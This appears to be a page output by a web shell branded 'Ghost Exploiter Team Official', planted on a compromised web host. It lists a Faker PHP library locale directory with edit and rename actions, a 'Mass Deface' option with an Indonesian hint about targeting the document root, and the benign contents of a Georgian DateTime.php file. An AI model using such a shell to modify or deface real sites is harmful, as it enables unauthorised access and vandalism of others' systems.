webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
fakerphp
/
faker
/
src
/
Faker
/
Provider
/
ka_GE
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Address.php
14.642KB
edt
ren
Color.php
1.068KB
edt
ren
Company.php
2.146KB
edt
ren
DateTime.php
1.395KB
edt
ren
Internet.php
0.415KB
edt
ren
Payment.php
2.227KB
edt
ren
Person.php
9.859KB
edt
ren
PhoneNumber.php
0.26KB
edt
ren
Text.php
381.676KB
edt
ren
<?php namespace Faker\Provider\ka_GE; class DateTime extends \Faker\Provider\DateTime { public static function dayOfWeek($max = 'now') { $map = [ 'Sunday' => 'კვირა', 'Monday' => 'ორშაბათი', 'Tuesday' => 'სამშაბათი', 'Wednesday' => 'ოთხშაბათი', 'Thursday' => 'ხუთშაბათი', 'Friday' => 'პარასკევი', 'Saturday' => 'შაბათი', ]; $week = static::dateTime($max)->format('l'); return $map[$week] ?? $week; } public static function monthName($max = 'now') { $map = [ 'January' => 'იანვარი', 'February' => 'თებერვალი', 'March' => 'მარტი', 'April' => 'აპრილი', 'May' => 'მაისი', 'June' => 'ივნისი', 'July' => 'ივლისი', 'August' => 'აგვისტო', 'September' => 'სექტემბერი', 'October' => 'ოქტომბერი', 'November' => 'ნოემბერი', 'December' => 'დეკემბერი', ]; $month = static::dateTime($max)->format('F'); return $map[$month] ?? $month; } }